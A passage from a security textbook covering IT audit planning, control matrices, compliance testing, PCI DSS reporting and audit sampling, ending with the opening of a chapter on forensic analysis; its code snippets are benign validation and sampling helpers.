When developing the Checklist, auditors recognize that it is not possible to test all components. Therefore, auditors test a random sample incorporating all or most types of components (e.g., transactions, devices, stores). Random sampling is useful, but some components may be more important to test than others based on increased risk. Therefore, risk raises the priority of certain tests, so that they are scheduled sooner and more often. Alternatively, critical components may be randomly tested at a higher rate than other components. Automation enables testing to occur frequently, such as daily or weekly, to safeguard integrity. Random sampling will be discussed further in the professional audit section.

The Audit Engagement Plan is presented during the Entrance Conference to the auditee organization, and specifically to the persons and managers who will participate in the audit. This enables auditees to be aware of what is happening, what is expected of them, and when it will happen [4]. It is important that the people who will participate in the audit be present, to inform them, help in scheduling, and possibly provide important feedback. A manager of the auditee organization should sign the Audit Engagement Plan. More extensive audit plans would include a project plan, including a schedule or timeline, documentation/deliverables, a set of required skills, resources, and tools, and a communication plan telling the auditee of the report distribution [3]. Table 15.2 shows a shortened version of an audit engagement plan, with minimal (test-oriented) sections and sample text. (The original was a draft; actual plans would always be fully typed.)


Table 15.2  Audit engagement plan example (workbook exercise)

Title: 2023 Audit engagement plan for Einstein University’s student DB web interface
Objective: Determine security of web interface for student databases
Scope: Penetration test on all web pages related to student-accessed databases: registration, financial aid, coursework, and grading.
Compliance and criteria: State breach notification law, FERPA
Constraints: Must perform security hacking tests between 1 and 6 AM
Risk analysis:
  Inherent risks (risks the organization is predisposed to):
    Data breach: Student grades, disabilities (FERPA), student health (HIPAA), student and employee financial account and payment card information (PCI DSS, state breach law), student social security numbers and passport numbers (state breach law). Students may agree to publish contact information annually (FERPA).
    Hacking: The university is an open system, with no limitations on installed software and BYOD devices. Student homework must be protected.
  Control risks (risk that a control has vulnerabilities):
    Insufficient firewall/IPS restrictions: While much of the university network is open, enabling the presence of malware, critical databases must be in a secure zone with highly restrictive access.
  Detection risk (risk of the auditor not detecting a problem):
    Hacker within confidential zone: This audit may not detect an infiltrated confidential zone or a critical vulnerability.
Approach: The penetration test includes:
  1. Tester has valid session credentials (i.e., is a student)
  2. Specific test records are available for attack
  3. Test attacks on all databases using manual and automated web testing tools
  4. Attempt a DDoS attack without using credentials
Checklist:
  The following databases & forms will be tested: registration process, financial aid and payment process, classroom software with homework assignments, submission and grading, accessing grades, advising records, transcripts …
  Security attacks will be tested for all databases/forms: invalid input, buffer overflow, SQL injection, cross-site scripting, cross-site request forgery, clickjacking.
  Logs will be confirmed to identify attacks (but not user errors), including the above listed attacks and those that failed in previous audits.
  Confidential zone audit: firewall scan, network sniffing, log analysis of server and firewall.
Signatures: Ellie Smith, CISO; Terry Doe, CISA    Date: June 1, 2023

The most important part of the audit plan is the Signature at the bottom, because it gives an auditor or tester permission to perform the specified security tests [4]. It is the auditor’s get-out-of-jail card, in case testing produces undesirable results or news. There have been a number of cases where ethical hackers, and even IT employees, were prosecuted for hacking after they discovered breaches or security problems and tried to report them. An example of an external hacker who handled his discovery poorly follows; do know that employees have been treated similarly when they performed security tests they were not authorized to execute: “Weev” Auernheimer created a web crawler to access publicly available information on an AT&T website, and reported a security breach to the Gawker blog [1].


The breach information included the email addresses of 114,000 iPad users, including Mayor Michael Bloomberg and Rahm Emanuel, then White House chief of staff. His whistleblowing efforts resulted in a prison sentence of 41 months and a $73,000 fine for breach notification damages to AT&T. In summary, be sure to ALWAYS get specific permission before performing any security tests, even if you believe it is in your list of job responsibilities. Once the Audit Engagement Plan is signed, the audit can begin.

15.1.2 Step 2: Reviewing Internal Controls

The first task is to organize the set of controls to determine whether the internal controls are at least theoretically adequate or whether an enhancement in security design is necessary. Preventive controls are most desirable, but detective and corrective controls also play an important role. During the third stage, the auditor will test the controls to validate their implementation, including determining their specific capabilities and configuration.

A control matrix (Table 15.3) is useful in this stage’s theoretical analysis to evaluate the design of controls: where controls are weak or insubstantial and where vulnerabilities exist [2]. To prepare a control matrix, list attacks or problems as column headings across the top row of the table, and list controls as row headings down the left-most column. Attacks and controls can be added as needed. Controls are evaluated per vulnerability as strong (***), medium (**), weak (*), or blank for not applicable, appropriate, or available. In addition, controls can be evaluated as Preventive (p), Detective (d), or Corrective (c). Table 15.3 notes Strong Preventive as (pp). An Overlapping Control is two strong controls, which is of course preferred. A Compensating Control is where a strong control supports a weak one. It is recommended that at least one strong control exists per vulnerability and that multiple controls exist. This table may be listed directly within the audit report findings. The controls matrix is only a theoretical evaluation; the actual implementation of the controls is tested during the next step.
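To illustrate the recommendation that every vulnerability has at least one strong control and more than one control overall, here is a minimal sketch that flags gaps in a control-matrix fragment. The matrix entries below are hypothetical, not the book’s Table 15.3 values.

```python
# Fragment of a controls matrix as nested dicts: for each problem, each
# control's rating uses the p/d/c codes; a doubled letter (e.g., "pp")
# marks a strong control, as described in the text.
matrix = {
    "data breach": {"access control": "p", "firewall": "pp", "logs/SIEM": "d"},
    "power failure": {"policies/procedures": "cc"},
    "fraud": {"authentication": "p", "logs/SIEM": "pd"},
}

def weak_spots(matrix: dict[str, dict[str, str]]) -> list[str]:
    """Flag problems lacking a strong control, or covered by only one control."""
    findings = []
    for problem, controls in matrix.items():
        has_strong = any(code.count(ch) >= 2
                         for code in controls.values() for ch in "pdc")
        if not has_strong:
            findings.append(f"{problem}: no strong control")
        if len(controls) < 2:
            findings.append(f"{problem}: fewer than two controls")
    return findings

print(weak_spots(matrix))
# ['power failure: fewer than two controls', 'fraud: no strong control']
```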

15.1.3 Step 3: Performing Compliance and Substantive Tests

Actually testing the controls requires working closely with members of the auditee organization. Be careful not to antagonize! The auditor should always be polite and never use an accusatory tone or words with the persons they are working with [4]. It is possible to inform by saying "best practices involve …" while avoiding the word 'you', as in "you should …" Their feedback can be included in the final report, as well as your professional opinion. It is good to note, and include in the final report, where the organization is doing things well and who is performing particularly well, in addition to where improvements need to be made … in a tactful way.


Table 15.3  Audit controls matrix (workbook exercise)

Threats (columns): disk failure, power failure, data breach, fraud, hack, social engineering, malware, stolen/lost equipment.
Controls (rows): access control; authentication; antivirus; firewall; logs/alarms/SIEM; physical security; strong policies, standards, guidelines, procedures; security awareness training; vulnerability management; email security management; application firewall.
Each cell rates a control against a threat as preventive (p), detective (d), and/or corrective (c), with doubled letters marking strong controls. For example, logs/alarms/SIEM are detective (d) for disk and power failures; strong policies are strongly corrective (cc) for those threats; and vulnerability management is strongly preventive (pp) against hacking.

An audit or auditor may focus on one or both of compliance and substantive testing. Compliance tests evaluate security controls, whereas substantive tests evaluate whether business transactions are properly processed. Figure 15.2 shows that, in the defense-in-depth onion analogy, the onion layers are the security controls (compliance) that protect the (substantive) business data at the core of the onion. Thus, substantive tests ensure that transactions are valid and not modified or destroyed in processing. For example, a batch processing control validates throughout processing that the total number of transactions, the financial transaction total, and/or a hash total on certain fields remains consistent. Batch controls ensure that any problem transactions are resolved [2]. Another form of substantive testing is input validation [2]:

• Sequence check: Sequence numbers are indeed sequential.
• Range check: Input data is within appropriate lower and upper bounds.
• Validity check: Input can be one of a set of valid entries (e.g., sex = M or F).
• Reasonableness check: The transaction appears normal. For example, an order count is within the normal range of purchases.
• Existence check: All required fields have been input; optional fields need not be entered.
• Key verification: An entry is typed twice to ensure accuracy, e.g., in setting up a password.
• Logical relationship check: Data entered is consistent, e.g., a child of 5 years does not have a driver's license number.
• Check digit: An algorithm on a field is used to generate a check digit, which matches an entered number when the field is entered correctly. This check protects against transcription errors.
• Type check: Entered data is in the appropriate form. For example, a name would not consist solely of numbers, and a quantity field allows only numbers.
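To make a few of these checks concrete, here is a brief, hedged Python sketch. The Luhn algorithm is used as a stand-in check-digit scheme (an assumption; the text does not prescribe a specific algorithm), and the function names are illustrative.

```python
# Hedged sketch of three input-validation checks from the list above.
def range_check(value, low, high):
    """Range check: value within lower and upper bounds."""
    return low <= value <= high

def validity_check(value, allowed=frozenset({"M", "F"})):
    """Validity check: value is one of a set of valid entries."""
    return value in allowed

def luhn_check(number: str) -> bool:
    """Check digit via the Luhn algorithm (used by payment cards)."""
    digits = [int(d) for d in number if d.isdigit()]
    plain = sum(digits[-1::-2])                        # undoubled digits
    doubled = sum(sum(divmod(2 * d, 10)) for d in digits[-2::-2])
    return (plain + doubled) % 10 == 0

assert range_check(12, 1, 100)
assert validity_check("M")
assert luhn_check("4539578763621486")    # a well-formed example number
```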


Fig. 15.2  Substantive versus compliance testing

The focus of this book is security controls, i.e., the compliance arena. A first security test may ensure that servers and user computers are securely configured, with needless services removed and exposed vulnerabilities (which may bring unwanted attention) resolved [12]. The test should also validate that all systems are patched, two-factor authentication with strong passwords is used, backups are verified regularly, updated antivirus software is implemented, and users are trained in security awareness. Continuous Audit is a more advanced stage of audit, which automates the validation of security controls: checks of preventive and detective security controls execute regularly (weekly, daily, or more frequently) and provide reports and alerts. Many of the top 18 controls, as outlined in the Metrics chapter, are best implemented using seamless and automated security checks.


An auditor relies upon a number of software tools to perform substantive and compliance tests, including tools which access and analyze data in databases and which perform penetration and vulnerability tests. These software tools are called Computer-Assisted Audit Techniques (CAAT). They may include utility software, network scanning software, application traces, expert systems, and generalized audit software. The auditor often specifies these tests in the audit plan and report.

15.1.4 Step 4: Preparing and Presenting the Report

The Audit Report should have a unique title and publication date. The Objective, Scope, Period of Audit, and Compliance and Criteria sections can be copied from the Audit Engagement Plan. The Executive Summary describes, in non-technical language, the auditor's overall opinion about the effectiveness of controls, the risks resulting from any deficiencies, and any reservations or qualifications the auditor holds [2]. The Detailed Audit Findings and Recommendations section describes the findings and recommendations, organized logically by materiality or intended recipient [2]. It may or may not include minor deficiencies, which can be communicated separately via a letter, depending on management preference. Finally, the document should include the names and signatures of the auditors, and it should be written clearly. Table 15.4 shows an abbreviated Audit Report.

Table 15.4  Abbreviated audit report (workbook exercise)

Title: 2023 Audit report for Einstein University's student DB web interface
Objective: Determine security of web interface for student databases
Scope: Penetration test on all web pages related to student-accessed databases: registration, financial aid, coursework, and grading
Period of audit: May 21–28, 2023
Compliance and criteria:
  Compliance: State breach notification law, FERPA
  Criteria: Top 18 controls; certified ethical hacker tests related to web penetration tests
Assertions: As per the audit engagement letter, dated March 5, 2023, management asserted that university management has established effective internal controls for accounting and information systems, and is compliant with all laws. Management agreed to provide all necessary documentation for the audit, including policies, procedures and previous audit data, as well as auditor access to the applicable systems as a student user.
Executive summary: It is the opinion of the auditor that there were material weaknesses within the web interface. Web interfaces A and B were secure, but web interfaces C and D need additional security.
Detailed findings and recommendations: The following attacks were successful on the indicated databases. Also listed are the recommended fixes. …
Evidence: Screenshots are attached in Appendix A.
Signed: John Smith, CISA CISSP   Date: 4/13/2023

Optional sections may include a distribution list, a list of management assertions, proposed rework dates, statements of responsibility, disclaimers, and audit methods used [8]. Assertions, if included, are the auditee management's statements indicating adherence to regulation, establishment of internal controls, a lack of awareness of existing fraud, and a promise of cooperation in providing auditor-requested documentation.


Management Assertions can serve as audit criteria to test against. Both external and internal audits would include additional statements of responsibility (external audits many, internal audits some). These statements detail expectations, mainly of the auditee, in providing the necessary documentation, agreeing to audit criteria, and disclosing any outstanding issues. The report may also include disclaimers to limit auditor liability, for example for undetected fraud or future changes in control use. These sections are not included in Table 15.4, but can be found in ISACA's "IS Audit and Assurance Guideline 2401 Reporting" [8]. The audit report should disclose the specific measurement methods used (if multiple options exist), any deviations from normal measurement practices, and whether and where any interpretation of data impacted the result. After preparing the audit report, the auditor tactfully presents it to the persons who participated in the audit, as part of an Exit Conference [4]. Some meeting feedback (e.g., reasons or compensating controls) may be discussed and added to the final report. The auditor does not change their audit opinion, but they can add the opinions or reasons provided by staff. Then external (and possibly internal) auditors present their report to upper management. Both presentations should indicate things done well, as well as areas for improvement. The report to upper management should avoid being overly technical. An audit is useless unless management acts on its findings. Management is responsible for defining how it will address shortcomings in some form of audit response plan. Security testers and internal auditors normally follow up to ensure that the plan addresses deficiencies, and that those deficiencies are fixed [2]. Alternatively, management must formally take responsibility for not acting [3].

15.2 Example: PCI DSS Audits and Report on Compliance

The document Payment Card Industry, Requirements and Security Assessment Procedures, found at www.pcisecuritystandards.org, serves as an excellent baseline security audit plan [13]. At a very high level, PCI DSS requires quarterly scanning tests and an annual penetration test. The pen test should also be performed after any significant change to hardware, system software, or an important application in a critical zone. In addition to high-level requirements, PCI DSS provides a detailed list of tests for each of the 12 PCI DSS basic requirements; a short sample is shown in Table 15.5 [13]. Note that these tests are detailed and explicit, enabling the audit plan to be clearly understood. A PCI DSS Report on Compliance (ROC) is a form of audit report. The outline of the ROC is as follows [13]:


Table 15.5  Short snapshot of PCI DSS testing requirements [11]

Defined approach requirement 9.1.2: Roles and responsibilities for performing activities in Requirement 9 are documented, assigned, and understood.
  Testing procedure 9.1.2.a: Examine documentation to verify that descriptions of roles and responsibilities for performing activities in Requirement 9 are documented and assigned.
  Testing procedure 9.1.2.b: Interview personnel with responsibility for performing activities in Requirement 9 to verify that roles and responsibilities are assigned as documented and are understood.
Defined approach requirement 9.2.1: Appropriate facility entry controls are in place to restrict physical access to systems in the CDE.
  Testing procedure 9.2.1: Observe entry controls and interview responsible personnel to verify that physical security controls are in place to restrict access to systems in the CDE.

1. Contact Information and Report Summary: This summary includes a description of the auditee and auditor organizations, the dates of the audit, portions tested remotely versus onsite, a summary of findings for this audit, and signatures.

2. Business Overview: A high-level summary of the payment card operations of the business.

3. Scope of Work and Approach Taken: The scope of the audit indicates the parts of the organization that were actually reviewed, including which business environments and network segments were covered and whether sampling was used. It is important to record all cardholder processing equipment and software, their versions, and whether each is PA-DSS compliant.

4. Details about Reviewed Environment: This section outlines a detailed description of the cardholder data environment, including how payment card data is specifically processed, which files are used and how they are secured, and how access is logged. It includes a high-level network diagram and an account data flow diagram. This section also defines any managed service provider or third-party access to cardholder data/equipment. Of particular interest is whether any wholly-owned entities (e.g., third party), international or wireless environments were included. To achieve PCI DSS compliance, it is possible to use sampling. However, sampling must cover all possible business and technological configurations, and be geographically diverse. For example, it is not possible to test only Sun OS equipment without testing Microsoft or other used equipment. It is also important to justify, in a documented rationale, how the sampling was appropriate and complete.

5. Quarterly Scan Reports: After the first year, the organization must pass all four quarterly scans. Internal and external scan results are included. Each scan shall cover all externally accessible (or Internet-facing) IP addresses for the organization.

6. Evidence: A description of documentation, interviews, observations and system evidence.

7. Part 2: Findings and Observations: This part follows the 'Detailed PCI DSS Requirements and Security Assessment Procedures' [11] template to provide a detailed description of each finding. Any Not Applicable responses or compensating controls must be fully defined.



15.3 Professional and External Auditing

Professional auditing is concerned with ensuring that the audit follows a defined process and is well documented. Documentation of evidence should rely on statistically based analysis. Problems found by the audit are classified by severity, and follow-up ensures that issues are acted upon.

15.3.1 Audit Resources

To guide auditors in following a professional audit process, ISACA provides a set of standards. Table 15.6 outlines ISACA's IT Assurance Framework (ITAF) [9], which describes this set of standards and guidelines, developed using materials from the IT Governance Institute (ITGI) and other sources.

Table 15.6  ISACA's IT assurance framework [9]

General (Standards 1000 & Guidelines 2000): Defines guiding principles for IT audit and assurance, including audit charter, organizational independence, auditor objectivity, reasonable expectation, due professional care, proficiency, assertions, criteria, etc.
Performance (Standards 1200 & Guidelines 2200): Audit and assurance engagements must include risk assessment and planning, audit scheduling, engagement planning, performance and supervision, evidence, using the work of other experts, and irregularities and illegal acts.
Reporting (Standards 1400 & Guidelines 2400): Audit report standards cover reporting and follow-up activities.


The IT Assurance Framework [9] recommends a possible extended outline for the audit engagement plan:

• Areas to be audited
• Objectives
• Scope
• Resources: e.g., staff, tools, budget, schedules
• Timeline and deliverables
• Applicable laws/regulations and professional auditing standards
• Use of a risk-based approach, not related to regulatory compliance
• Engagement-specific issues
• Documentation and reporting requirements
• Planned use of technology and data analytics
• Reflection on the cost of the audit engagement versus potential benefits
• Communication and escalation protocols for unplanned issues (e.g., changed schedules)

15.3.2 Sampling

Evidence must be statistically significant to be valid and credible. Rarely can the entire population of data or controls be validated, so sampling is used to reach a conclusion. Sample transactions or units may be selected randomly or systematically, such as every N units [14]. Figure 15.3 shows that the sample is a small subset of the total population, which is hopefully representative of that population. This precision can be measured by comparing the sample and population mean and standard deviation. A confidence coefficient is the confidence level, or probability, that the sample truly represents the population; a confidence level of 95% is considered a high degree of comfort [2]. This type of sampling is called statistical sampling, and is useful in reaching conclusions about a population. Another means of achieving statistical sampling accuracy is to use a similar stratification for the sample as exists in the total population [14]. For example, if it is known that bank transactions are 60% credit/debit; 10% each deposits, withdrawals and ATM transactions; and 5% each investments and loans, then sample transactions can be selected to match that stratification, as part of a Stratified Mean per Unit. Variable Sampling can estimate the population stratification or determine the appropriateness of the sample in representing the total population [2]. Difference Estimation is a use of Variable Sampling to compare the sample versus population stratification statistics. With Unstratified Mean per Unit, the population stratification is not known, and the sample stratification results are used to estimate the population stratification. These Variable Sampling techniques are shown in Fig. 15.4.
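As a concrete illustration of stratified selection, the hedged sketch below draws a sample whose strata match the bank-transaction proportions quoted above; the record layout and field name are hypothetical.

```python
# Hedged sketch: stratified sample selection matching known population
# proportions. The record layout ({"type": ...}) is a hypothetical example.
import random

STRATA = {"credit/debit": 0.60, "deposit": 0.10, "withdrawal": 0.10,
          "ATM": 0.10, "investment": 0.05, "loan": 0.05}

def stratified_sample(population, size, strata=STRATA, seed=1):
    rng = random.Random(seed)        # fixed seed keeps the audit repeatable
    sample = []
    for stratum, share in strata.items():
        pool = [rec for rec in population if rec["type"] == stratum]
        want = round(size * share)
        sample.extend(rng.sample(pool, min(want, len(pool))))
    return sample

# e.g., sample = stratified_sample(transactions, size=400)
```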

Fig. 15.3  Population sampling


Fig. 15.4  Variable sampling using stratification

Variable Sampling provides results as a total or average quantity, such as in monetary units, and is often used in substantive testing. In order to evaluate high-risk areas, the auditor may choose to oversample a certain characteristic. Nonstatistical (or judgmental) sampling is used when the sample is not intended to match the general population, such as when samples are selected for a high-risk characteristic. Attribute Sampling is useful in answering questions such as: How many of transaction X have this characteristic? This technique is commonly used in compliance testing to measure the rate of compliance [2]. An example test might be: How many transaction batches with errors were fully analyzed and properly documented? The Tolerable Error is the maximum problem rate that an auditor will accept before passing a test [2]. In some cases, the observed problem rate may be very close to or exceed the Tolerable Error; then it makes sense to test a larger sample to better understand the problem. Discovery Sampling is useful when the expected problem rate is extremely low (e.g., fraud), and is implemented by first testing some minimal sample. In Stop-or-Go Sampling, slightly more testing occurs if any problems are found: if the first 100 have zero errors, then stop; otherwise, if the first 1000 have fewer than 10 errors, stop; and so on. If sampling sounds complicated, then Generalized Audit Software (GAS) can help. GAS is a utility that makes the auditor's life easier by automating sampling and statistical operations. GAS can manipulate files by sorting, indexing, and merging [2]. It can select and read a set of records to create a sample, and calculate statistical properties (including precision, stratification, frequency analysis) and other arithmetic operations (such as sequence checking, attribute sampling) on the sample.
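Returning to Stop-or-Go Sampling, the rule just described reduces to a short escalation loop. The sketch below is a hedged illustration encoding the 100-then-1000 thresholds from the text; the stage sizes are parameters, and the error predicate is supplied by the auditor.

```python
# Hedged sketch of Stop-or-Go sampling: stop as soon as a stage's
# observed errors stay within its tolerable error, otherwise escalate.
def stop_or_go(items, has_error, stages=((100, 0), (1000, 9))):
    """Return (passed, items_tested); stages = (sample size, max errors)."""
    errors = tested = 0
    for size, tolerable in stages:
        while tested < min(size, len(items)):
            errors += bool(has_error(items[tested]))
            tested += 1
        if errors <= tolerable:
            return True, tested          # within tolerable error: stop
    return False, tested                 # exceeded all stages: fail

# e.g., passed, n = stop_or_go(batches, lambda b: b["unresolved_errors"] > 0)
```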


15.3.3 Evidence and Conclusions

Evidence is taken from test results, documentation, interviews, observations and email. Evidence can be insufficient and/or contradictory. The most reliable evidence is external, objective, qualified and timely. External evidence is derived from sources outside the auditee organization, such as contracts, letters or reports. Objective evidence is less prone to judgment: for example, actual transaction results and reports, compared to what someone might say. Knowledgeable people closest to the operation are more qualified sources than persons less involved. Finally, all evidence should refer to the time period under review. Problems that can be found during an audit include errors, omissions, irregularities and illegal acts [2]. These problems, or audit exceptions, can be ranked as an Inconsequential Deficiency, a Significant Deficiency, a Material Weakness or a Pervasive Weakness. An Inconsequential Deficiency is insignificant, even when combined with other problems [8]. A Significant Deficiency is a significant problem of some consequence. The Material Weakness designation may be used when controls are not in place, not in use, or inadequate, when multiple significant deficiencies result in a significant vulnerability, and whenever escalation is required [3]. A Pervasive Weakness indicates multiple material weaknesses. The audit report includes a summary evaluation, which considers the deficiencies in total. If a potential fraud or illegal action is found during the audit, the auditor should prioritize confirming and obtaining sufficient details of the problem, then report the finding to an appropriate level of management or the audit committee expediently (i.e., before writing the audit report) [3]. Summary evaluations for audit engagements can be categorized as [8]:

• Unqualified: Internal controls were effective.
• Qualified: Control weaknesses exist or may exist but are not pervasive. This evaluation may be given when there is insufficient evidence or known material weaknesses.
• Adverse: Significant deficiencies result in material weakness and pervasive weaknesses.
• Disclaimer: The auditor cannot form an opinion, since they cannot obtain sufficient and/or appropriate evidence.

In addition to noting problems, the auditor should suggest fixes or remediations. If a fix is not available, mitigation techniques may be suggested. During audit presentations, the auditor should present all control weaknesses and specify in the report that appropriate management and governance have been informed of the weaknesses [8].


15.3.4 Variations in Audit Types

This section has so far focused on an IS audit. However, other types of audits exist [2]:

• IS Audit: Evaluates information systems safeguards for data in efficiently providing confidentiality, integrity, and availability
• Financial Audit: Assures integrity of financial statements
• Operational Audit: Evaluates internal controls for a given process or area
• Integrated Audit: Includes a combination of Financial, IS and/or Operational audits
• Forensic Audit: Investigates a fraud or crime
• Administrative Audit: Assesses the efficiency of a process or organization

The Integrated Audit combines financial, operational and/or IS audits to focus on business risk [2]. A team of specialists works together to produce one integrated audit report, which helps management to better understand and relate to aspects they have less expertise in. Control Self-Assessment is a form of internal audit that involves many people in the organization. Functional areas become the first line of defense, as teams attend workshops to learn to design and assess controls locally [2]. This technique is beneficial in that employees are trained and get involved in the security design process, helping them to own the process and detect risks quickly. It enhances external audit.

15.4 Questions and Problems

1. Vocabulary. Match each meaning with the correct word:

Inherent risk, Control risk, Constraint, Audit risk, Detection risk, Audit objective, Audit subject, Audit scope, Audit plan, Audit engagement plan, Compliance test, Substantive test

(a) A business or industry is prone to specific risks.
(b) A strategic schedule to audit parts of the organization during different years.
(c) A test that ensures that proper processing of business transactions occurs.
(d) A statement of the coverage of the audit, specifying geography, time and/or business unit.
(e) A statement of the purpose of the audit, as defined in an audit plan.
(f) A risk that a security control does not operate as expected.
(g) A risk that an audit does not discover an existing problem.

2. Audit Plan for a Specific Regulation. Consider an industry you currently work in or would like to work in, and a regulation that applies to this industry. Assume the company is in your geographical region.


You may use the Security Workbook Audit Chapter to complete the tables.

(a) Create an 'Audit Plan Schedule' Table, similar to Table 15.1. In this plan, consider how you might schedule testing of the entire regulation (related to information security) over time. Specify the objective of each audit being scheduled.
(b) Create an 'Audit Engagement Plan' Table, similar to Table 15.2. Develop one audit engagement plan, including a detailed checklist of tests, for one of the audits you planned in part (a) of this question. Hint: You may include reviewing documentation, interviewing or observing work, executing tests on data, or any other test functions shown or described in the section entitled "Performing Compliance and Substantive Tests".

3. Control Matrix for a Specific Regulation. Consider an industry you currently work in or would like to work in, and a regulation that applies to this industry. Assume the company is in your geographical region. You may use the Security Workbook Audit Chapter to complete the table.

(a) Create a 'Control Matrix' Table, similar to Table 15.3. Select six risks that you think are the highest priority for your industry. Then include as rows appropriate controls that you think will safeguard your organization. You have a blank check, and you may and should add controls as appropriate. Be sure to complete the table, showing whether controls are strong, medium or weak, and whether they are preventive, detective or corrective in nature. Add text explaining why you chose your controls, and why they warrant the rating you gave them.

Note: Consider these sites:
1. PCI DSS: Access information from https://www.pcisecuritystandards.org/security_standards/. Select the PCI DSS link. Register and download 'PCI DSS v4.0'. Skim the 'Detailed PCI DSS Requirements', starting on page 37.
2. European Union: Chap. 17 of this text, or the General Data Protection Regulation (GDPR): https://gdpr-info.eu
3. USA, HIPAA/HITECH: Chap. 19 of this text, or www.hhs.gov (Health and Human Services); search for HIPAA.
4. USA, Gramm–Leach–Bliley and Red Flags Rule: Federal Trade Commission: http://www.business.ftc.gov/privacy-and-security
5. USA, Sarbanes–Oxley: www.isaca.org (organizations for standards/security). Your instructor may provide 'Information Security Student Book: Using COBIT®5 for Information Security', available at www.isaca.org. Additional information is at www.sans.org; search for 'COBIT'.
6. USA, FISMA: Access www.nist.gov (National Institute of Standards and Technology) and search for FISMA. Specific link: https://csrc.nist.gov/Projects/risk-management/fisma-background. Access NIST SP 800-37 Rev. 2 first.


15.4.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor, or can be found at https://sn.pub/lecturer-material.

Case study: Developing a partial audit plan
Health First case study: √
Other resources: Security Workbook; HIPAA slides or notes

References

1. Ludlow P (2013) Opinionator: Hacktivists as gadflies. New York Times, 14 April 2013
2. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 33–72, 223–226
3. ISACA (2013) ITAF™: a professional practices framework for IS audit/assurance, 2nd edn. ISACA, Arlington Heights, pp 9–40
4. SANS (2005) 507.1 auditing principles and concepts. SANS Institute, Bethesda. www.sans.org
5. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill, New York, pp 121–125
6. ISACA (2013) IS audit and assurance guideline 2202 risk assessment in planning. Exposure draft. ISACA, Arlington Heights, pp 2–10
7. ISACA (2013) IS audit and assurance guideline 2201 engagement planning. Exposure draft. ISACA, Arlington Heights, pp 2–8
8. ISACA (2013) IS audit and assurance guideline 2401 reporting. Exposure draft. ISACA, Arlington Heights, pp 2–10
9. ISACA (2022) IT Audit Framework (ITAF™): professional practices framework for IT audit, 4th edn
10. Walker M (2012) All-in-one CEH™ certified ethical hacker exam guide. McGraw-Hill, New York
11. PCI Security Standards Council (2022) Payment card industry data security standard: requirements and testing procedures, v4.0, March 2022. www.pcisecuritystandards.org
12. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013
13. Payment Card Industry (2022) PCI DSS v4.0 report on compliance template, revision 1, December 2022. www.pcisecuritystandards.org
14. ISACA (2013) IS audit and assurance guideline 2208 sampling. Exposure draft. ISACA, Arlington Heights, pp 2–9

Chapter 16

Preparing for Forensic Analysis

China has reiterated on multiple occasions that given the virtual nature of cyberspace and the fact that there are all kinds of online actors who are difficult to trace, tracing the source of cyberattacks is a complex technical issue. It is also a highly sensitive political issue to pin the label of cyberattack to a certain government. –Wang Wenbin, a spokesman for China’s Ministry of Foreign Affairs [1]

This chapter is intimately linked with incident response: first you respond to an incident to contain it, then you must analyze it. It is important to find the root cause, or the criminal will return to your network (or, worse yet, never leave). While the Incident Response chapter focuses more on the business side of what is important, this chapter introduces the technical issues of how to find information and track it. The chapter addresses what is important to collect, where it is located, and how it should be collected, by describing the forensic process, a technical overview, and legal requirements.

16.1 Important Concepts

Time is of the essence in an incident response scenario. Two competing goals are to: (1) extract meaningful forensic data, and (2) contain the incident. These two goals may be prioritized in reverse order, based on business requirements. A final goal may be to (3) properly collect evidence for a legal case. The Incident Response chapter emphasizes goal (2); this chapter emphasizes goals (1) and (3). The approach to forensic analysis, when an incident has occurred and is being investigated, is to ask a series of questions: who, what, when, where, why …? It is important to build a timeline showing what happened when and where [3]. The developed case must be fact-based, proven with artifacts. Events of interest are the filtered events showing relevant actions. Evidence should corroborate the story from multiple perspectives: for example, the host requested a website from DNS, then the application webserver got the request, and the database reported the attack – all within 15 minutes, with times noted and supporting information such as source IP and MAC addresses.


As more facts are found, the theory of the case may change, and additional evidence acquired. These multiple perspectives can be pulled from servers, network devices and host machines. All the forensic data obtained will need to be interpreted to tell a forensic story, at a high level, of the criminal attack. However, to obtain these artifacts, technical information about the servers, network devices and host machines must be mastered. Many of the artifacts will come from a host's memory, network logs, security utilities, and network sniffing tools (e.g., Wireshark). These tools must be set up properly in advance to ensure that the data has not been modified by the attacker; we need to ensure collected data reflects a true, authentic picture of what is happening on the system. Thus, technical expertise is needed to answer the high-level forensic questions asked above. Finally, if the case goes to court, it must be well-constructed. Imagine you are sitting as an expert in a court of law, and the opposing lawyer sees opportunities to win their case by finding minor flaws in your procedures, or your failure to detect or record one or more events. They can question your qualifications, ask questions outside your area of knowledge, or demonstrate a flaw in your chain of custody procedure. There are requirements to obtaining evidence, including meeting chain of custody requirements to show restricted access; collecting authentic evidence through integrity-checked evidence and analysis on copies; using tools that are acceptable in court; and full documentation of how evidence was obtained and analyzed [3]. In addition to the opposing lawyer tripping you up, criminals are also looking for their escape hatch. The means of communication for forensics should be outside of normal corporate communications; this may include private cell phones and external email accounts [5]. The Incident Response Team must be well trained to execute their responsibilities. Three areas of expertise must be applied simultaneously during a forensic investigation: forensic analysis skills to select and analyze the forensic evidence, technical forensic skills to access the forensic evidence, and legal evidence skills to meet legal requirements for authenticity and chain of custody. Table 16.1 helps to build and ensure proper training for IRT members. These three sets of skills are used simultaneously and described in this chapter.

Table 16.1  IRT personnel and call list

For each area of expertise, record contact information (name(s), email, phone) and training completed or needed:
• Forensic software: forensic certification
• Networking, protocol analysis: networking education or certification
• Host logs (Windows, Linux, …): system certification (per system being analyzed)
• SIEM expertise


16.2 High-Level Forensic Analysis: Investigating an Incident

The process of investigating an incident includes establishing the questions you would like to answer as part of the forensic investigation, collecting volatile information from memory, and collecting nonvolatile information, such as logs and disk images, for forensic analysis of systems. Other network devices may also offer important information. Throughout the process, maintaining chain of custody is critical for potential evidence.

16.2.1 Establishing Forensic Questions

The first step is to ask relevant questions about the scenario [3]. In an example scenario, we assume that a rogue Wireless Access Point (WAP) has been observed. This may be detected as a new Ethernet node appearing on the network, requesting an IP address and forwarding packets from a variety of IP addresses, or via radio (e.g., Wi-Fi) as a new competing WAP. The relevant questions that may be asked for this scenario are shown in Table 16.2. Answers to these questions should paint a clear story that leaves no doubt as to the originator(s), actions and intent.

